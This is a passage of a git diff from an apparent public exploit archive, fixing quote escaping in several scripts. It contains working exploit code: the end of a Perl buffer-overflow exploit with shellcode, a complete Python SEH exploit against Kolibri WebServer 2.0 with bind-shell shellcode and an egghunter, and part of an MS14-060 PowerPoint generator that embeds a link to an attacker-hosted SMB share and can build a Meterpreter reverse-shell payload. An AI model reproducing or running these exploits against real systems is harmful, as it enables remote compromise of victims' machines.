+$exploit = "\x00\x02";                                      #write request (header)
 
-$exploit=$exploit.\"A\";                                      #file name   
+$exploit=$exploit."A";                                      #file name   
 
-$exploit=$exploit.\"\\x00\";                                   #Start of transporting name
+$exploit=$exploit."\x00";                                   #Start of transporting name
 
 $exploit=$exploit.$nop;                                     #nop sled to land into shellcode 
 
@@ -92,17 +92,17 @@ $exploit=$exploit.$shellcode;                               #our Hell code
 
 $exploit=$exploit.$jmp_2000;                               #jump to shellcode 
 
-$exploit=$exploit.\"\\x00\";                                   #end of TS mode name
+$exploit=$exploit."\x00";                                   #end of TS mode name
 
 
 
 print $target $exploit;                                     #Attack on victim
 
-print \"++ Exploit packet sent ...\\n\";
+print "++ Exploit packet sent ...\n";
 
-print \"++ Done.\\n\";
+print "++ Done.\n";
 
-print \"++ Telnet to 4444 on victim\'s machine ....\\n\";
+print "++ Telnet to 4444 on victim's machine ....\n";
 sleep(2);
 
 
diff --git a/platforms/windows/remote/34059.py b/platforms/windows/remote/34059.py
index ddc10ee3b..e8370cb02 100755
--- a/platforms/windows/remote/34059.py
+++ b/platforms/windows/remote/34059.py
@@ -7,13 +7,13 @@
 # Tested on 		: Windows XP SP2 Eng, Windows Server 2003 Eng, Win 7 SP1 Eng
 import socket, sys
 
-help = \"\"\"Kolibri WebServer 2.0 Get Request SEH Exploit
+help = """Kolibri WebServer 2.0 Get Request SEH Exploit
 
 Target
 [1]Windows XP SP2 Eng & Windows 2003 SP2 Eng
 [2]Windows 7 SP1 Eng
 
-Usage : %s [rhost] [port] [target]\"\"\" %sys.argv[0]
+Usage : %s [rhost] [port] [target]""" %sys.argv[0]
 
 try:
 	script, rhost, port, target = sys.argv
@@ -25,94 +25,94 @@ try:
 	port = int(port)
 	target = int(target)
 except ValueError:
-	print \"Port & Target should number !\"
+	print "Port & Target should number !"
 	exit() 
 
 #msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_mixed -t c
-shellcode = (\"\\x89\\xe2\\xd9\\xc4\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\\x49\"
-\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"
-\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"
-\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"
-\"\\x39\\x6c\\x79\\x78\\x6f\\x79\\x75\\x50\\x57\\x70\\x53\\x30\\x65\\x30\\x6f\"
-\"\\x79\\x68\\x65\\x50\\x31\\x69\\x42\\x71\\x74\\x6c\\x4b\\x43\\x62\\x46\\x50\"
-\"\\x6e\\x6b\\x61\\x42\\x74\\x4c\\x6c\\x4b\\x66\\x32\\x35\\x44\\x4e\\x6b\\x33\"
-\"\\x42\\x64\\x68\\x66\\x6f\\x6c\\x77\\x51\\x5a\\x37\\x56\\x75\\x61\\x79\\x6f\"
-\"\\x30\\x31\\x49\\x50\\x6e\\x4c\\x65\\x6c\\x73\\x51\\x53\\x4c\\x45\\x52\\x46\"
-\"\\x4c\\x67\\x50\\x49\\x51\\x48\\x4f\\x56\\x6d\\x53\\x31\\x38\\x47\\x39\\x72\"
-\"\\x4a\\x50\\x72\\x72\\x36\\x37\\x4e\\x6b\\x62\\x72\\x54\\x50\\x6c\\x4b\\x43\"
-\"\\x72\\x55\\x6c\\x36\\x61\\x6e\\x30\\x6e\\x6b\\x33\\x70\\x72\\x58\\x6e\\x65\"
-\"\\x39\\x50\\x52\\x54\\x50\\x4a\\x47\\x71\\x6e\\x30\\x32\\x70\\x4c\\x4b\\x72\"
-\"\\x68\\x35\\x48\\x4e\\x6b\\x50\\x58\\x45\\x70\\x45\\x51\\x4e\\x33\\x6d\\x33\"
-\"\\x35\\x6c\\x43\\x79\\x4c\\x4b\\x64\\x74\\x4c\\x4b\\x57\\x71\\x49\\x46\\x55\"
-\"\\x61\\x79\\x6f\\x50\\x31\\x6f\\x30\\x4e\\x4c\\x39\\x51\\x48\\x4f\\x44\\x4d\"
-\"\\x37\\x71\\x59\\x57\\x64\\x78\\x79\\x70\\x53\\x45\\x69\\x64\\x76\\x63\\x33\"
-\"\\x4d\\x79\\x68\\x37\\x4b\\x53\\x4d\\x45\\x74\\x30\\x75\\x58\\x62\\x30\\x58\"
-\"\\x4c\\x4b\\x31\\x48\\x67\\x54\\x36\\x61\\x78\\x53\\x53\\x56\\x6c\\x4b\\x74\"
-\"\\x4c\\x50\\x4b\\x4c\\x4b\\x53\\x68\\x47\\x6c\\x36\\x61\\x48\\x53\\x6c\\x4b\"
-\"\\x76\\x64\\x4c\\x4b\\x73\\x31\\x4a\\x70\\x4b\\x39\\x33\\x74\\x61\\x34\\x47\"
-\"\\x54\\x33\\x6b\\x71\\x4b\\x70\\x61\\x50\\x59\\x52\\x7a\\x50\\x51\\x4b\\x4f\"
-\"\\x6d\\x30\\x31\\x48\\x43\\x6f\\x53\\x6a\\x6c\\x4b\\x66\\x72\\x38\\x6b\\x6c\"
-\"\\x46\\x53\\x6d\\x70\\x68\\x34\\x73\\x36\\x52\\x33\\x30\\x53\\x30\\x52\\x48\"
-\"\\x72\\x57\\x50\\x73\\x45\\x62\\x53\\x6f\\x76\\x34\\x51\\x78\\x72\\x6c\\x62\"
-\"\\x57\\x46\\x46\\x47\\x77\\x79\\x6f\\x78\\x55\\x78\\x38\\x4e\\x70\\x35\\x51\"
-\"\\x45\\x50\\x53\\x30\\x35\\x79\\x6a\\x64\\x31\\x44\\x76\\x30\\x71\\x78\\x61\"
-\"\\x39\\x6d\\x50\\x50\\x6b\\x35\\x50\\x49\\x6f\\x6a\\x75\\x32\\x70\\x30\\x50\"
-\"\\x72\\x70\\x66\\x30\\x61\\x50\\x36\\x30\\x31\\x50\\x50\\x50\\x51\\x78\\x68\"
-\"\\x6a\\x64\\x4f\\x69\\x4f\\x59\\x70\\x4b\\x4f\\x38\\x55\\x4b\\x39\\x38\\x47\"
-\"\\x44\\x71\\x79\\x4b\\x43\\x63\\x31\\x78\\x37\\x72\\x67\\x70\\x52\\x36\\x47\"
-\"\\x32\\x6f\\x79\\x4a\\x46\\x72\\x4a\\x72\\x30\\x46\\x36\\x50\\x57\\x52\\x48\"
-\"\\x79\\x52\\x79\\x4b\\x74\\x77\\x30\\x67\\x59\\x6f\\x58\\x55\\x46\\x33\\x61\"
-\"\\x47\\x53\\x58\\x6e\\x57\\x69\\x79\\x65\\x68\\x59\\x6f\\x59\\x6f\\x69\\x45\"
-\"\\x46\\x33\\x30\\x53\\x76\\x37\\x50\\x68\\x74\\x34\\x78\\x6c\\x47\\x4b\\x48\"
-\"\\x61\\x6b\\x4f\\x4a\\x75\\x43\\x67\\x4d\\x59\\x38\\x47\\x65\\x38\\x61\\x65\"
-\"\\x70\\x6e\\x70\\x4d\\x61\\x71\\x79\\x6f\\x39\\x45\\x70\\x68\\x31\\x73\\x50\"
-\"\\x6d\\x31\\x74\\x67\\x70\\x6f\\x79\\x39\\x73\\x32\\x77\\x52\\x77\\x70\\x57\"
-\"\\x66\\x51\\x68\\x76\\x73\\x5a\\x54\\x52\\x46\\x39\\x63\\x66\\x69\\x72\\x69\"
-\"\\x6d\\x61\\x76\\x4a\\x67\\x33\\x74\\x76\\x44\\x65\\x6c\\x55\\x51\\x73\\x31\"
-\"\\x6c\\x4d\\x43\\x74\\x31\\x34\\x32\\x30\\x4a\\x66\\x67\\x70\\x57\\x34\\x56\"
-\"\\x34\\x36\\x30\\x30\\x56\\x56\\x36\\x30\\x56\\x43\\x76\\x42\\x76\\x32\\x6e\"
-\"\\x71\\x46\\x36\\x36\\x70\\x53\\x46\\x36\\x55\\x38\\x33\\x49\\x78\\x4c\\x37\"
-\"\\x4f\\x6b\\x36\\x49\\x6f\\x49\\x45\\x4b\\x39\\x59\\x70\\x50\\x4e\\x31\\x46\"
-\"\\x50\\x46\\x49\\x6f\\x50\\x30\\x42\\x48\\x36\\x68\\x4e\\x67\\x35\\x4d\\x73\"
-\"\\x50\\x6b\\x4f\\x59\\x45\\x6f\\x4b\\x4c\\x30\\x48\\x35\\x4f\\x52\\x33\\x66\"
-\"\\x63\\x58\\x6d\\x76\\x5a\\x35\\x6f\\x4d\\x6f\\x6d\\x69\\x6f\\x58\\x55\\x77\"
-\"\\x4c\\x63\\x36\\x33\\x4c\\x56\\x6a\\x6b\\x30\\x69\\x6b\\x4d\\x30\\x53\\x45\"
-\"\\x45\\x55\\x4f\\x4b\\x70\\x47\\x52\\x33\\x44\\x32\\x52\\x4f\\x51\\x7a\\x63\"
-\"\\x30\\x66\\x33\\x6b\\x4f\\x78\\x55\\x41\\x41\")
+shellcode = ("\x89\xe2\xd9\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x39\x6c\x79\x78\x6f\x79\x75\x50\x57\x70\x53\x30\x65\x30\x6f"
+"\x79\x68\x65\x50\x31\x69\x42\x71\x74\x6c\x4b\x43\x62\x46\x50"
+"\x6e\x6b\x61\x42\x74\x4c\x6c\x4b\x66\x32\x35\x44\x4e\x6b\x33"
+"\x42\x64\x68\x66\x6f\x6c\x77\x51\x5a\x37\x56\x75\x61\x79\x6f"
+"\x30\x31\x49\x50\x6e\x4c\x65\x6c\x73\x51\x53\x4c\x45\x52\x46"
+"\x4c\x67\x50\x49\x51\x48\x4f\x56\x6d\x53\x31\x38\x47\x39\x72"
+"\x4a\x50\x72\x72\x36\x37\x4e\x6b\x62\x72\x54\x50\x6c\x4b\x43"
+"\x72\x55\x6c\x36\x61\x6e\x30\x6e\x6b\x33\x70\x72\x58\x6e\x65"
+"\x39\x50\x52\x54\x50\x4a\x47\x71\x6e\x30\x32\x70\x4c\x4b\x72"
+"\x68\x35\x48\x4e\x6b\x50\x58\x45\x70\x45\x51\x4e\x33\x6d\x33"
+"\x35\x6c\x43\x79\x4c\x4b\x64\x74\x4c\x4b\x57\x71\x49\x46\x55"
+"\x61\x79\x6f\x50\x31\x6f\x30\x4e\x4c\x39\x51\x48\x4f\x44\x4d"
+"\x37\x71\x59\x57\x64\x78\x79\x70\x53\x45\x69\x64\x76\x63\x33"
+"\x4d\x79\x68\x37\x4b\x53\x4d\x45\x74\x30\x75\x58\x62\x30\x58"
+"\x4c\x4b\x31\x48\x67\x54\x36\x61\x78\x53\x53\x56\x6c\x4b\x74"
+"\x4c\x50\x4b\x4c\x4b\x53\x68\x47\x6c\x36\x61\x48\x53\x6c\x4b"
+"\x76\x64\x4c\x4b\x73\x31\x4a\x70\x4b\x39\x33\x74\x61\x34\x47"
+"\x54\x33\x6b\x71\x4b\x70\x61\x50\x59\x52\x7a\x50\x51\x4b\x4f"
+"\x6d\x30\x31\x48\x43\x6f\x53\x6a\x6c\x4b\x66\x72\x38\x6b\x6c"
+"\x46\x53\x6d\x70\x68\x34\x73\x36\x52\x33\x30\x53\x30\x52\x48"
+"\x72\x57\x50\x73\x45\x62\x53\x6f\x76\x34\x51\x78\x72\x6c\x62"
+"\x57\x46\x46\x47\x77\x79\x6f\x78\x55\x78\x38\x4e\x70\x35\x51"
+"\x45\x50\x53\x30\x35\x79\x6a\x64\x31\x44\x76\x30\x71\x78\x61"
+"\x39\x6d\x50\x50\x6b\x35\x50\x49\x6f\x6a\x75\x32\x70\x30\x50"
+"\x72\x70\x66\x30\x61\x50\x36\x30\x31\x50\x50\x50\x51\x78\x68"
+"\x6a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x38\x55\x4b\x39\x38\x47"
+"\x44\x71\x79\x4b\x43\x63\x31\x78\x37\x72\x67\x70\x52\x36\x47"
+"\x32\x6f\x79\x4a\x46\x72\x4a\x72\x30\x46\x36\x50\x57\x52\x48"
+"\x79\x52\x79\x4b\x74\x77\x30\x67\x59\x6f\x58\x55\x46\x33\x61"
+"\x47\x53\x58\x6e\x57\x69\x79\x65\x68\x59\x6f\x59\x6f\x69\x45"
+"\x46\x33\x30\x53\x76\x37\x50\x68\x74\x34\x78\x6c\x47\x4b\x48"
+"\x61\x6b\x4f\x4a\x75\x43\x67\x4d\x59\x38\x47\x65\x38\x61\x65"
+"\x70\x6e\x70\x4d\x61\x71\x79\x6f\x39\x45\x70\x68\x31\x73\x50"
+"\x6d\x31\x74\x67\x70\x6f\x79\x39\x73\x32\x77\x52\x77\x70\x57"
+"\x66\x51\x68\x76\x73\x5a\x54\x52\x46\x39\x63\x66\x69\x72\x69"
+"\x6d\x61\x76\x4a\x67\x33\x74\x76\x44\x65\x6c\x55\x51\x73\x31"
+"\x6c\x4d\x43\x74\x31\x34\x32\x30\x4a\x66\x67\x70\x57\x34\x56"
+"\x34\x36\x30\x30\x56\x56\x36\x30\x56\x43\x76\x42\x76\x32\x6e"
+"\x71\x46\x36\x36\x70\x53\x46\x36\x55\x38\x33\x49\x78\x4c\x37"
+"\x4f\x6b\x36\x49\x6f\x49\x45\x4b\x39\x59\x70\x50\x4e\x31\x46"
+"\x50\x46\x49\x6f\x50\x30\x42\x48\x36\x68\x4e\x67\x35\x4d\x73"
+"\x50\x6b\x4f\x59\x45\x6f\x4b\x4c\x30\x48\x35\x4f\x52\x33\x66"
+"\x63\x58\x6d\x76\x5a\x35\x6f\x4d\x6f\x6d\x69\x6f\x58\x55\x77"
+"\x4c\x63\x36\x33\x4c\x56\x6a\x6b\x30\x69\x6b\x4d\x30\x53\x45"
+"\x45\x55\x4f\x4b\x70\x47\x52\x33\x44\x32\x52\x4f\x51\x7a\x63"
+"\x30\x66\x33\x6b\x4f\x78\x55\x41\x41")
 
-#egghunter\'s tag : doge
-egghunter = (\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"
-\"\\xef\\xb8\\x64\\x6f\\x67\\x65\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\")
+#egghunter's tag : doge
+egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x64\x6f\x67\x65\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
 
 if target == 1:
 	buff = 792
 elif target == 2:
 	buff = 794
 else:
-	print \"Input Target option\'s number !\"
+	print "Input Target option's number !"
 	exit()
 
-buffer = \"\\x90\"*(buff-20-32-4)
+buffer = "\x90"*(buff-20-32-4)
 buffer += egghunter
-buffer += \"\\x90\"*20
-buffer += \"\\xEB\\xBA\\x90\\x90\"
-buffer += \"\\xC2\\x15\\x40\"		#/p/p/r kolibri.exe
+buffer += "\x90"*20
+buffer += "\xEB\xBA\x90\x90"
+buffer += "\xC2\x15\x40"		#/p/p/r kolibri.exe
 
-eggshell = \"dogedoge\"+shellcode
+eggshell = "dogedoge"+shellcode
 
 evil = (
-\"GET /\"+buffer+\" HTTP/1.1\\r\\n\"
-\"Host: \"+eggshell+\"\\r\\n\"
-\"User-Agent: kepo\\r\\n\"
-\"Connection: close\\r\\n\\r\\n\")
+"GET /"+buffer+" HTTP/1.1\r\n"
+"Host: "+eggshell+"\r\n"
+"User-Agent: kepo\r\n"
+"Connection: close\r\n\r\n")
 
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
 	s.connect((rhost, port))
 except socket.error:
-	print \"[!]Host down or unreachable !\"
+	print "[!]Host down or unreachable !"
 	exit()
 s.send(evil)
 s.close()
 
-print \"Exploit sended ! Wait a minute the egghunter may take a while to find the tag...\"
+print "Exploit sended ! Wait a minute the egghunter may take a while to find the tag..."
diff --git a/platforms/windows/remote/35055.py b/platforms/windows/remote/35055.py
index bc84b911a..3d2ef06e4 100755
--- a/platforms/windows/remote/35055.py
+++ b/platforms/windows/remote/35055.py
@@ -16,20 +16,20 @@ from pptx import Presentation
 # Args/Usage  
 def get_args():
  
-    parser = argparse.ArgumentParser( prog=\"ms14_060.py\",
+    parser = argparse.ArgumentParser( prog="ms14_060.py",
                                       formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
-                                      epilog= \'\'\'This script will build a blank PowerPoint show (ppsx) file to exploit the
+                                      epilog= '''This script will build a blank PowerPoint show (ppsx) file to exploit the
                                       OLE Remote Code Execution vulnerability identified as MS14-060 (CVE-2014-4114)
 				                          Simply pass filename of resulting PPSX and IP Address of remote machine hosting the
 				                          share. You can add content to the PPSX file after it has been created. 
                                       The script will also create the INF file and an optional Meterpreter
 				                          reverse_tcp executable with the -m switch. Alternatively, you can host your own exectuble payload. 
-                                      Host the INF and GIF (EXE) in an SMB share called \"share\".
-                                      Note: Requires python-pptx\'\'\')
+                                      Host the INF and GIF (EXE) in an SMB share called "share".
+                                      Note: Requires python-pptx''')
  
-    parser.add_argument(\"filename\", help=\"Name of resulting PPSX exploit file\")
-    parser.add_argument(\"ip\", help=\"IP Address of Remote machine hosting the share\")
-    parser.add_argument(\"-m\", \"--msf\", help=\"Set if you want to create Meterpreter gif executable. Pass port (uses ip arg)\")
+    parser.add_argument("filename", help="Name of resulting PPSX exploit file")
+    parser.add_argument("ip", help="IP Address of Remote machine hosting the share")
+    parser.add_argument("-m", "--msf", help="Set if you want to create Meterpreter gif executable. Pass port (uses ip arg)")
     args = parser.parse_args()
  
     return args
@@ -37,104 +37,104 @@ def get_args():
  
 # write file
 def write_file(filename, contents):
-    f = open(filename, \"w\")
+    f = open(filename, "w")
     f.write(contents)
     f.close()
  
 # build bin
 def build_bin(embed, ip, share, file): 
  
-    bin = \"\\xD0\\xCF\\x11\\xE0\\xA1\\xB1\\x1A\\xE1\" # ole header
-    bin = bin + \"\\x00\" * 16 
-    bin = bin + \"\\x3E\\x00\\x03\\x00\\xFE\\xFF\\x09\\x00\"
-    bin = bin + \"\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-    bin = bin + \"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"
-    bin = bin + \"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-    bin = bin + \"\\x00\\x10\\x00\\x00\\x02\\x00\\x00\\x00\"
-    bin = bin + \"\\x01\\x00\\x00\\x00\\xFE\\xFF\\xFF\\xFF\"
-    bin = bin + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
-    bin = bin + \"\\xFF\" * 432
-    bin = bin + \"\\xFD\\xFF\\xFF\\xFF\\xFE\\xFF\\xFF\\xFF\"
-    bin = bin + \"\\xFE\\xFF\\xFF\\xFF\\xFE\\xFF\\xFF\\xFF\"
-    bin = bin + \"\\xFF\" * 496
-    bin = bin + \"\\x52\\x00\\x6F\\x00\\x6F\\x00\\x74\\x00\"
-    bin = bin + \"\\x20\\x00\\x45\\x00\\x6E\\x00\\x74\\x00\"
-    bin = bin + \"\\x72\\x00\\x79\\x00\\x00\\x00\\x00\\x00\"
-    bin = bin + \"\\x00\" * 40
-    bin = bin + \"\\x16\\x00\\x05\\x00\\xFF\\xFF\\xFF\\xFF\"
-    bin = bin + \"\\xFF\\xFF\\xFF\\xFF\\x01\\x00\\x00\\x00\"
-    bin = bin + \"\\x02\\x26\\x02\\x00\\x00\\x00\\x00\\x00\"
-    bin = bin + \"\\xC0\\x00\\x00\\x00\\x00\\x00\\x00\\x46\"
-    bin = bin + \"\\x00\" * 12
-    bin = bin + \"\\xF0\\x75\\xFD\\x41\\x63\\xB2\\xCF\\x01\"
-    bin = bin + \"\\x03\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"
-    bin = bin + \"\\x00\\x00\\x00\\x00\\x01\\x00\\x4F\\x00\"
-    bin = bin + \"\\x4C\\x00\\x45\\x00\\x31\\x00\\x30\\x00\"
-    bin = bin + \"\\x4E\\x00\\x61\\x00\\x74\\x00\\x69\\x00\"
-    bin = bin + \"\\x76\\x00\\x65\\x00\\x00\\x00\\x00\\x00\"
-    bin = bin + \"\\x00\" * 36
-    bin = bin + \"\\x1A\\x00\\x02\\x01\"
-    bin = bin + \"\\xFF\" * 12
-    bin = bin + \"\\x00\" * 40
-    bin = bin + \"\\x37\"
-    bin = bin + \"\\x00\" * 75
-    bin = bin + \"\\xFF\" * 12
-    bin = bin + \"\\x00\" * 116
-    bin = bin + \"\\xFF\" * 12
-    bin = bin + \"\\x00\" * 48
-    bin = bin + \"\\xFE\"
-    bin = bin + \"\\xFF\" * 511
-    bin = bin + \"\\x33\\x00\\x00\\x00\" + embed + \"\\x00\" # 3   EmbeddedStgX.txt 
-    bin = bin + \"\\x5C\\x5C\" + ip + \"\\x5C\" + share + \"\\x5C\" + file # \\\\ip\\share\\file    
-    bin = bin + \"\\x00\" * 460
+    bin = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" # ole header
+    bin = bin + "\x00" * 16 
+    bin = bin + "\x3E\x00\x03\x00\xFE\xFF\x09\x00"
+    bin = bin + "\x06\x00\x00\x00\x00\x00\x00\x00"
+    bin = bin + "\x00\x00\x00\x00\x01\x00\x00\x00"
+    bin = bin + "\x01\x00\x00\x00\x00\x00\x00\x00"
+    bin = bin + "\x00\x10\x00\x00\x02\x00\x00\x00"
+    bin = bin + "\x01\x00\x00\x00\xFE\xFF\xFF\xFF"
+    bin = bin + "\x00\x00\x00\x00\x00\x00\x00\x00"
+    bin = bin + "\xFF" * 432
+    bin = bin + "\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
+    bin = bin + "\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
+    bin = bin + "\xFF" * 496
+    bin = bin + "\x52\x00\x6F\x00\x6F\x00\x74\x00"
+    bin = bin + "\x20\x00\x45\x00\x6E\x00\x74\x00"
+    bin = bin + "\x72\x00\x79\x00\x00\x00\x00\x00"
+    bin = bin + "\x00" * 40
+    bin = bin + "\x16\x00\x05\x00\xFF\xFF\xFF\xFF"
+    bin = bin + "\xFF\xFF\xFF\xFF\x01\x00\x00\x00"
+    bin = bin + "\x02\x26\x02\x00\x00\x00\x00\x00"
+    bin = bin + "\xC0\x00\x00\x00\x00\x00\x00\x46"
+    bin = bin + "\x00" * 12
+    bin = bin + "\xF0\x75\xFD\x41\x63\xB2\xCF\x01"
+    bin = bin + "\x03\x00\x00\x00\x40\x00\x00\x00"
+    bin = bin + "\x00\x00\x00\x00\x01\x00\x4F\x00"
+    bin = bin + "\x4C\x00\x45\x00\x31\x00\x30\x00"
+    bin = bin + "\x4E\x00\x61\x00\x74\x00\x69\x00"
+    bin = bin + "\x76\x00\x65\x00\x00\x00\x00\x00"
+    bin = bin + "\x00" * 36
+    bin = bin + "\x1A\x00\x02\x01"
+    bin = bin + "\xFF" * 12
+    bin = bin + "\x00" * 40
+    bin = bin + "\x37"
+    bin = bin + "\x00" * 75
+    bin = bin + "\xFF" * 12
+    bin = bin + "\x00" * 116
+    bin = bin + "\xFF" * 12
+    bin = bin + "\x00" * 48
+    bin = bin + "\xFE"
+    bin = bin + "\xFF" * 511
+    bin = bin + "\x33\x00\x00\x00" + embed + "\x00" # 3   EmbeddedStgX.txt 
+    bin = bin + "\x5C\x5C" + ip + "\x5C" + share + "\x5C" + file # \\ip\share\file    
+    bin = bin + "\x00" * 460
     return bin
 
 # build ppt/drawings/vmlDrawing1.vml	
 def build_vml():
-    xml = \'<xml xmlns:v=\"urn:schemas-microsoft-com:vml\" xmlns:o=\"urn:schemas-microsoft-com:office:office\" xmlns:p=\"urn:schemas-microsoft-com:office:powerpoint\" xmlns:oa=\"urn:schemas-microsoft-com:office:activation\">\'
-    xml = xml + \'<o:shapelayout v:ext=\"edit\"><o:idmap v:ext=\"edit\" data=\"1\"/></o:shapelayout><v:shapetype id=\"_x0000_t75\" coordsize=\"21600,21600\" o:spt=\"75\" o:preferrelative=\"t\" path=\"m@4@5l@4@11@9@11@9@5xe\" filled=\"f\" stroked=\"f\">\'
-    xml = xml + \'<v:stroke joinstyle=\"miter\"/><v:formulas><v:f eqn=\"if lineDrawn pixelLineWidth 0\"/><v:f eqn=\"sum @0 1 0\"/><v:f eqn=\"sum 0 0 @1\"/><v:f eqn=\"prod @2 1 2\"/><v:f eqn=\"prod @3 21600 pixelWidth\"/><v:f eqn=\"prod @3 21600 pixelHeight\"/><v:f eqn=\"sum @0 0 1\"/>\'
-    xml = xml + \'<v:f eqn=\"prod @6 1 2\"/><v:f eqn=\"prod @7 21600 pixelWidth\"/><v:f eqn=\"sum @8 21600 0\"/><v:f eqn=\"prod @7 21600 pixelHeight\"/><v:f eqn=\"sum @10 21600 0\"/></v:formulas>\'
-    xml = xml + \'<v:path o:extrusionok=\"f\" gradientshapeok=\"t\" o:connecttype=\"rect\"/><o:lock v:ext=\"edit\" aspectratio=\"t\"/></v:shapetype><v:shape id=\"_x0000_s1026\" type=\"#_x0000_t75\" style=\"position:absolute; left:100pt;top:-100pt;width:30pt;height:30pt\"><v:imagedata o:relid=\"rId1\" o:title=\"\"/></v:shape><v:shape id=\"_x0000_s1027\" type=\"#_x0000_t75\" style=\"position:absolute; left:150pt;top:-100pt;width:30pt;height:30pt\">\'
-    xml = xml + \'<v:imagedata o:relid=\"rId2\" o:title=\"\"/></v:shape></xml>\'
+    xml = '<xml xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:p="urn:schemas-microsoft-com:office:powerpoint" xmlns:oa="urn:schemas-microsoft-com:office:activation">'
+    xml = xml + '<o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">'
+    xml = xml + '<v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/>'
+    xml = xml + '<v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas>'
+    xml = xml + '<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute; left:100pt;top:-100pt;width:30pt;height:30pt"><v:imagedata o:relid="rId1" o:title=""/></v:shape><v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute; left:150pt;top:-100pt;width:30pt;height:30pt">'
+    xml = xml + '<v:imagedata o:relid="rId2" o:title=""/></v:shape></xml>'
     return xml
  
  # build ppt/slides/_rels/slide1.xml.rels
 def build_xml_rels(ole1, ole2):
-    xml = \'<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\'
-    xml = xml + \'<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId3\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" Target=\"../embeddings/\' + ole1 + \'\"/><Relationship Id=\"rId4\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" Target=\"../embeddings/\' + ole2 + \'\"/><Relationship Id=\"rId2\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout\" Target=\"../slideLayouts/slideLayout1.xml\"/><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing\" Target=\"../drawings/vmlDrawing1.vml\"/></Relationships>\'  
+    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
+    xml = xml + '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole1 + '"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole2 + '"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/></Relationships>'  
     return xml
  
 def build_xml_slide1():
-    xml = \'<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\'
